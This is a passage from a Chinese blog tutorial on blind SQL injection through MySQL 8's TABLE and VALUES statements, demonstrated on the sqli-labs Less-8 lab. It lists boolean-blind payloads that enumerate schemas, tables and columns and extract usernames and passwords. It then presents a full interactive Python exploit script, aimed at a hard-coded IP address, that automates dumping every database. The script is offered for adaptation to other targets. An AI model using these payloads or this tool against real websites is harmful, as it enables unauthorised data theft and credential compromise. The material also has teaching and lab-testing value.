
浅谈利用mysql8新特性进行SQL注入(4)

(3)爆数据表
information_schema.tables表有21列

1' and ('def','security','users','',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)<=(table information_schema.tables limit 317,1)--+ #第一个表users
1' and ('def','security','emails','',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)<=(table information_schema.tables limit 318,1)--+ #第二个表emails
1' and ('def','security','uagents','',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)<=(table information_schema.tables limit 319,1)--+ #第三个表uagents
1' and ('def','security','referers','',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)<=(table information_schema.tables limit 320,1)--+ #第四个表referers

前两列('def' 和库名)是确定的,可以写一个 for 循环逐行判断:第一次结果为真的那一行就是该库在 information_schema.tables 中的起始行(这里是 limit 317,1,即第 318 行),然后再对第三列(表名)进行盲注。
(4)爆字段名
information_schema.columns表有22列
得到所有表名后开始判断字段名:在 information_schema.columns 表中先定位目标表的起始行,再逐列盲注,具体方法和上面一样。

1' and ('def','security','users','id','',6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22)<=(table information_schema.columns limit 3386,1)--+ #users表第一个字段为id
1' and ('def','security','users','password','',6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22)<=(table information_schema.columns limit 3387,1)--+ #users表,第二个字段为password
1' and ('def','security','users','username','',6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22)<=(table information_schema.columns limit 3388,1)--+ #users表,第三个字段为username

(5)爆数据

1' and (1,'D','')<=(table users limit 1)--+ #正常
1' and (1,'E','')<=(table users limit 1)--+ #错误
#table users limit 1 也就是 table users limit 0,1
#1' and (1,'D','')<=(table users limit 0,1)--+ #正常
#1' and (1,'E','')<=(table users limit 0,1)--+ #错误
......
1' and (1,'Dumb','Dumb')<=(table users limit 1)--+ #正常
1' and (1,'Dumb','Dumc')<=(table users limit 1)--+ #错误

得到第1个记录为1 Dumb Dumb

1' and (8,'admin','admin')<=(table users limit 7,1)--+ #正常
1' and (8,'admin','admio')<=(table users limit 7,1)--+ #错误

得到第8个记录为8 admin admin
一步一步注出数据

0x05 脚本编写

一个一个手注,似乎有点麻烦。自己于是尝试写个脚本:

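'''
@author qwzf
@desc Boolean blind SQL-injection helper built on the MySQL 8 ``TABLE`` and
      ``VALUES`` statements (no column names needed).  The oracle is the page
      text: it contains "You are in" when the injected condition is true.
      Written for lab targets such as sqli-labs Less-8; only point it at
      systems you are authorised to test.
@date 2021/02/18
'''
import string
import sys

import requests

# Target URL; the injected value is appended directly to the ``id`` GET
# parameter.  main() lets argv[1] override it.
url = 'http://121.41.231.75:8002/Less-8/?id='
# Candidate alphabet of the classic ascii()/substr() blind mode in current_db().
chars = string.ascii_letters + string.digits + "@{}_-?"

# Substring that marks a TRUE answer from the boolean oracle.
TRUE_MARK = 'You are in'
# Seconds to wait per request; without a timeout one stalled response hangs the loop forever.
TIMEOUT = 10
# Guess codes 32..127 so that every printable ASCII character (32..126) can be
# resolved as "first guess that compares greater, minus one".
_GUESS_CODES = range(32, 128)
# Longest value _extract() recovers before giving up (the original loop was range(1, 20)).
_MAX_LEN = 19
# Main menu, printed before the choice is read.
_MENU = ("请输入要操作的内容: 1.爆当前数据库 2.爆数据表开始行号 3.爆数据表 "
         "4.爆字段值开始行号 5.爆字段值 6.爆数据 7.爆所有数据库")


def _ask(url: str, payload: str) -> bool:
    """Send one probe and return True when the oracle reports the condition as true.

    requests exceptions (timeout, connection errors) propagate to the caller.
    """
    response = requests.get(url=url + payload, timeout=TIMEOUT)
    return TRUE_MARK in response.text


def _read_int(prompt: str) -> int:
    """Print *prompt* (no newline) and read an integer, re-prompting on a non-numeric line."""
    while True:
        print(prompt, end='')
        try:
            return int(input())
        except ValueError:
            continue


def _read_str(prompt: str) -> str:
    """Print *prompt* (no newline) and return the line typed by the user."""
    print(prompt, end='')
    return input()


def _upper_bound(name: str) -> str:
    """Return *name* with its last character incremented.

    Every string that starts with *name* compares below the result, so the pair
    (name, _upper_bound(name)) brackets "rows that belong to name".  Raises
    ValueError on an empty name.  NOTE(review): for a name ending in 'z'/'Z'
    the incremented character is '{'/'[', which a collation may order before
    letters -- confirm before relying on the bracket (the original had the same
    limitation).
    """
    if not name:
        raise ValueError('name must not be empty')
    return name[:-1] + chr(ord(name[-1]) + 1)


def _find_start_row(url: str, lower_tpl: str, upper_tpl: str,
                    start: int, stop: int, what: str) -> int:
    """Return the first row index in [start, stop) lying between two bounds.

    Both templates carry one ``{}`` slot for the LIMIT offset and are true when
    the bound compares *below* the row; a row is a hit when the lower bound is
    below it and the upper bound is not.  One request per row, two for
    candidates.  Prints the hit and returns it; raises LookupError when no row
    in the range matches.  NOTE(review): ``TABLE ... LIMIT n,1`` assumes the
    server returns rows in a stable order -- the original made the same
    assumption.
    """
    for row in range(start, stop):
        if _ask(url, lower_tpl.format(row)) and not _ask(url, upper_tpl.format(row)):
            print('从第', row, '行开始爆' + what)
            return row
    raise LookupError('no matching row in rows {}..{}'.format(start, stop - 1))


def _extract(url: str, template: str, max_len: int = _MAX_LEN) -> str:
    """Recover one string through a "guess > target" oracle, printing progress.

    *template* holds one ``{}`` slot that receives the hex literal of the guess;
    the oracle is True when the tuple containing the guess compares greater
    than the target row.  Characters are fixed left to right: at each position
    the first guess code whose prefix exceeds the target gives the character as
    (code - 1).  When even prefix + ' ' exceeds the target, the target equals
    the prefix and the extraction ends (the original appended chr(31) here and
    kept going).  A resolved space is held back until a later character
    confirms it, because with collations that ignore trailing spaces
    (PAD SPACE) a finished value would otherwise grow a tail of spaces.

    Comparison semantics follow the column collation: under a case-insensitive
    collation letter case cannot be recovered (uppercase guesses match first).
    A position whose character is outside printable ASCII stops the loop.
    Returns the recovered value.
    """
    name = ''
    pending = ''  # spaces resolved but not yet proven to be part of the value
    for _ in range(max_len):
        resolved = None
        for code in _GUESS_CODES:
            if _ask(url, template.format(str2hex(name + pending + chr(code)))):
                resolved = code - 1
                break
        if resolved is None:
            break  # no printable guess exceeds the target: non-ASCII character
        if resolved < 32:
            # prefix + ' ' already exceeds the target: value complete
            if pending:
                name += pending
                print(name)
            break
        if resolved == 32:
            pending += ' '
            continue
        name += pending + chr(resolved)
        pending = ''
        print(name)
    return name


def current_db(url: str) -> None:
    """Print the current database.

    Mode 1 uses MySQL 8's ``VALUES ROW(...)`` inside a UNION and dumps the whole
    response; mode 2 is a plain ascii()/substr() boolean blind extraction over
    ``chars`` (a character outside that alphabet ends the extraction early).
    """
    print("利用mysql8新特性或普通布尔盲注: 1.新特性(联合查询) 2.普通布尔盲注")
    num = _read_int("请输入序号:")
    if num == 1:
        payload = "-1' union values row(1,database(),3)--+"  # union query dumping database() (editable)
        response = requests.get(url=url + payload, timeout=TIMEOUT)
        print(response.text)
        return
    name = ''
    payload = "1' and ascii(substr((database()),{0},1))={1}--+"  # boolean blind (editable)
    for pos in range(1, 40):
        for candidate in chars:
            if _ask(url, payload.format(pos, ord(candidate))):
                name += candidate
                print(name)
                break
        else:
            # nothing matched at this position: end of the name (or a char outside ``chars``)
            break


def str2hex(name: str) -> str:
    """Return *name* as a MySQL hex literal, e.g. 'ab' -> '0x6162' ('' -> '0x').

    Hex literals keep quotes out of the injected tuple.  Code points above
    0xff are not zero-padded to byte pairs; callers only pass ASCII.
    """
    return '0x' + ''.join(format(ord(ch), 'x') for ch in name)


def dbs(url: str) -> None:
    """Interactively dump database names from information_schema.schemata (editable).

    Row k (1-based as typed) is compared as ('def', <guess>, '', 4, 5, 6) > row;
    with 'def' matching the catalog column, the guess is compared against the
    schema name.  0 or a negative number exits.
    """
    while True:
        row = _read_int("请输入要爆第几个数据库,如:1,2等:") - 1
        if row < 0:
            break
        template = ("1' and ('def',{},'',4,5,6)>(table information_schema.schemata limit "
                    + str(row) + ",1)--+")
        _extract(url, template)


def tables_n(url: str, database: str, start: int = 0, stop: int = 10000) -> int:
    """Find the first row of information_schema.tables that belongs to *database*.

    Scans rows start..stop-1 for the first row r with
    ('def', database, '', '', 5..21) < r and not ('def', database+1, '', '', 5..21) < r,
    i.e. the schema column starts with *database*.  Prints and returns the
    0-based row index.  Raises LookupError when nothing matches (the original
    returned an unbound ``n``) and ValueError for an empty name.  The upper
    bound is computed once: the original incremented *database* in place on
    every candidate row, so the check drifted after the first false candidate.
    """
    def template(db: str) -> str:
        return ("1' and ('def','" + db + "','','',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)"
                "<(table information_schema.tables limit {},1)--+")

    return _find_start_row(url, template(database), template(_upper_bound(database)),
                           start, stop, '数据表')


def tables(url: str, database: str, n: int) -> None:
    """Interactively dump table names of *database* (editable).

    *n* is the start row returned by tables_n(); table k (1-based as typed) is
    row n + k - 1 of information_schema.tables, compared as
    ('def', database, <guess>, '', 5..21) > row.  0 or a negative number exits.
    """
    while True:
        row = _read_int("请输入要爆第几个数据表,如:1,2等:") - 1
        if row < 0:
            break
        template = ("1' and ('def','" + database + "',{},'',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)"
                    ">(table information_schema.tables limit " + str(row + n) + ",1)--+")
        _extract(url, template)


def columns_n(url: str, database: str, table: str, start: int = 3000, stop: int = 10000) -> int:
    """Find the first row of information_schema.columns that belongs to *table*.

    Same bracketing as tables_n() over the 22-column columns table.  *start*
    defaults to 3000 as in the original, presumably to skip the system schemas
    of the author's instance; lower it if the target table is not found.
    Raises LookupError when nothing matches and ValueError for an empty name.
    """
    def template(tbl: str) -> str:
        return ("1' and ('def','" + database + "','" + tbl
                + "','',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22)"
                "<(table information_schema.columns limit {},1)--+")

    return _find_start_row(url, template(table), template(_upper_bound(table)),
                           start, stop, '字段')


def columns(url: str, database: str, table: str, n: int) -> None:
    """Interactively dump column names of *table* (editable).

    *n* is the start row returned by columns_n(); column k (1-based as typed)
    is row n + k - 1 of information_schema.columns, compared as
    ('def', database, table, <guess>, '', 6..22) > row.  0 or a negative
    number exits.
    """
    while True:
        row = _read_int("请输入要爆第几个字段,如:1,2等:") - 1
        if row < 0:
            break
        template = ("1' and ('def','" + database + "','" + table
                    + "',{},'',6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22)"
                    ">(table information_schema.columns limit " + str(row + n) + ",1)--+")
        _extract(url, template)


def datas(url: str, table: str) -> None:
    """Interactively dump the second column of *table* (editable).

    Assumes the sqli-labs layout: three columns whose first is an integer id
    equal to the 1-based row number, so (k, <guess>, '') > row compares the
    guess against the second column of row k.  Adjust the tuple for other
    tables.  0 or a negative number exits.
    """
    while True:
        x = _read_int("请输入要爆第几个数据,如:1,2等:")
        if x - 1 < 0:
            break
        template = ("1' and (" + str(x) + ",{},'')>(table " + table
                    + " limit " + str(x - 1) + ",1)--+")
        _extract(url, template)


def main(target: str = url) -> None:
    """Menu loop dispatching to the extraction helpers against *target*."""
    while True:
        print(_MENU)
        types = _read_int('')
        if types == 1:
            current_db(target)
        elif types in (2, 3):
            database = _read_str("请输入已经得到的数据库名:")
            if types == 2:
                tables_n(target, database)
            else:
                n = _read_int("爆数据表开始行号:")
                tables(target, database, n)
        elif types in (4, 5):
            database = _read_str("请输入已经得到的数据库名:")
            table = _read_str("请输入已经得到的数据表名:")
            if types == 4:
                columns_n(target, database, table)
            else:
                n = _read_int("爆字段值开始行号:")
                columns(target, database, table, n)
        elif types == 6:
            table = _read_str("请输入要查询的数据表名:")
            datas(target, table)
        else:
            dbs(target)


if __name__ == "__main__":
    # argv[1] overrides the hard-coded target; Ctrl-C / EOF ends the session quietly.
    try:
        main(sys.argv[1] if len(sys.argv) > 1 else url)
    except (KeyboardInterrupt, EOFError):
        pass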

经测试基本没有问题。上边脚本是 GET 型传参、参数名为 id 的脚本,可根据实际情况进行修改。需要注意两点:元组比较遵循目标列的排序规则(collation),在不区分大小写的排序规则下无法还原字母大小写,数值本身仍然正确;脚本中的目标地址是硬编码的,只应对自己搭建或已获授权的测试环境使用。

0x06 CTF题目实战

暂时没有找到题目环境,找到后再总结
参考:

0x07 后记

上面记录了mysql8新特性的sql注入。可能会有个别不恰当之处,欢迎大师傅批评指正!
